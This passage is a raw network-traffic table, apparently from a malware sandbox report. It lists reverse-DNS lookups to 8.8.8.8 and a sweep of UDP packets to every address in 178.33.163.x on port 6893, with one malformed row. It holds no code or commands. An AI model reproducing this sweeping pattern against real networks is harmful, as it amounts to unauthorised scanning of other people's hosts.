| US | 8.8.8.8:53 | 144.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 228.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.162.33.178.in-addr.arpa | udp |
| FR | 178.33.162.255:6893 | udp | |
| FR | 178.33.163.0:6893 | udp | |
| FR | 178.33.163.1:6893 | udp | |
| FR | 178.33.163.2:6893 | udp | |
| FR | 178.33.163.3:6893 | udp | |
| FR | 178.33.163.4:6893 | udp | |
| FR | 178.33.163.5:6893 | udp | |
| FR | 178.33.163.6:6893 | udp | |
| FR | 178.33.163.7:6893 | udp | |
| FR | 178.33.163.8:6893 | udp | |
| FR | 178.33.163.9:6893 | udp | |
| FR | 178.33.163.10:6893 | udp | |
| FR | 178.33.163.11:6893 | udp | |
| FR | 178.33.163.12:6893 | udp | |
| FR | 178.33.163.13:6893 | udp | |
| FR | 178.33.163.14:6893 | udp | |
| FR | 178.33.163.15:6893 | udp | |
| FR | 178.33.163.16:6893 | udp | |
| FR | 178.33.163.17:6893 | udp | |
| FR | 178.33.163.18:6893 | udp | |
| FR | 178.33.163.19:6893 | udp | |
| FR | 178.33.163.20:6893 | udp | |
| FR | 178.33.163.21:6893 | udp | |
| FR | 178.33.163.22:6893 | udp | |
| FR | 178.33.163.23:6893 | udp | |
| FR | 178.33.163.24:6893 | udp | |
| FR | 178.33.163.25:6893 | udp | |
| FR | 178.33.163.26:6893 | udp | |
| FR | 178.33.163.27:6893 | udp | |
| FR | 178.33.163.28:6893 | udp | |
| FR | 178.33.163.29:6893 | udp | |
| FR | 178.33.163.30:6893 | udp | |
| FR | 178.33.163.31:6893 | udp | |
| FR | 178.33.163.32:6893 | udp | |
| FR | 178.33.163.33:6893 | udp | |
| FR | 178.33.163.34:6893 | udp | |
| FR | 178.33.163.35:6893 | udp | |
| FR | 178.33.163.36:6893 | udp | |
| FR | 178.33.163.37:6893 | udp | |
| FR | 178.33.163.38:6893 | udp | |
| FR | 178.33.163.39:6893 | udp | |
| FR | 178.33.163.40:6893 | udp | |
| FR | 178.33.163.41:6893 | udp | |
| FR | 178.33.163.42:6893 | udp | |
| FR | 178.33.163.43:6893 | udp | |
| FR | 178.33.163.44:6893 | udp | |
| FR | 178.33.163.45:6893 | udp | |
| FR | 178.33.163.46:6893 | udp | |
| FR | 178.33.163.47:6893 | udp | |
| FR | 178.33.163.48:6893 | udp | |
| FR | 178.33.163.49:6893 | udp | |
| FR | 178.33.163.50:6893 | udp | |
| FR | 178.33.163.51:6893 | udp | |
| FR | 178.33.163.52:6893 | udp | |
| FR | 178.33.163.53:6893 | udp | |
| FR | 178.33.163.54:6893 | udp | |
| FR | 178.33.163.55:6893 | udp | |
| FR | 178.33.163.56:6893 | udp | |
| FR | 178.33.163.57:6893 | udp | |
| FR | 178.33.163.58:6893 | udp | |
| FR | 178.33.163.59:6893 | udp | |
| FR | 178.33.163.60:6893 | udp | |
| FR | 178.33.163.61:6893 | udp | |
| FR | 178.33.163.62:6893 | udp | |
| FR | 178.33.163.63:6893 | udp | |
| FR | 178.33.163.64:6893 | udp | |
| FR | 178.33.163.65:6893 | udp | |
| FR | 178.33.163.66:6893 | udp | |
| FR | 178.33.163.67:6893 | udp | |
| FR | 178.33.163.68:6893 | udp | |
| FR | 178.33.163.69:6893 | udp | |
| FR | 178.33.163.70:6893 | udp | |
| FR | 178.33.163.71:6893 | udp | |
| FR | 178.33.163.72:6893 | udp | |
| FR | 178.33.163.73:6893 | udp | |
| FR | 178.33.163.74:6893 | udp | |
| FR | 178.33.163.75:6893 | udp | |
| FR | 178.33.163.76:6893 | udp | |
| FR | 178.33.163.77:6893 | udp | |
| FR | 178.33.163.78:6893 | udp | |
| FR | 178.33.163.79:6893 | udp | |
| FR | 178.33.163.80:6893 | udp | |
| FR | 178.33.163.81:6893 | udp | |
| FR | 178.33.163.82:6893 | udp | |
| FR | 178.33.163.83:6893 | udp | |
| FR | 178.33.163.84:6893 | udp | |
| FR | 178.33.163.85:6893 | udp | |
| FR | 178.33.163.86:6893 | udp | |
| FR | 178.33.163.87:6893 | udp | |
| FR | 178.33.163.88:6893 | udp | |
| FR | 178.33.163.89:6893 | udp | |
| FR | 178.33.163.90:6893 | udp | |
| FR | 178.33.163.91:6893 | udp | |
| FR | 178.33.163.92:6893 | udp | |
| FR | 178.33.163.93:6893 | udp | |
| FR | 178.33.163.94:6893 | udp | |
| FR | 178.33.163.95:6893 | udp | |
| FR | 178.33.163.96:6893 | udp | |
| FR | 178.33.163.97:6893 | udp | |
| FR | 178.33.163.98:6893 | udp | |
| FR | 178.33.163.99:6893 | udp | |
| FR | 178.33.163.100:6893 | udp | |
| FR | 178.33.163.101:6893 | udp | |
| FR | 178.33.163.102:6893 | udp | |
| FR | 178.33.163.103:6893 | udp | |
| FR | 178.33.163.104:6893 | udp | |
| FR | 178.33.163.105:6893 | udp | |
| FR | 178.33.163.106:6893 | udp | |
| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| US | 8.8.8.8:53 | 255.162.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.163.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.163.33.178.in-addr.arpa | udp |
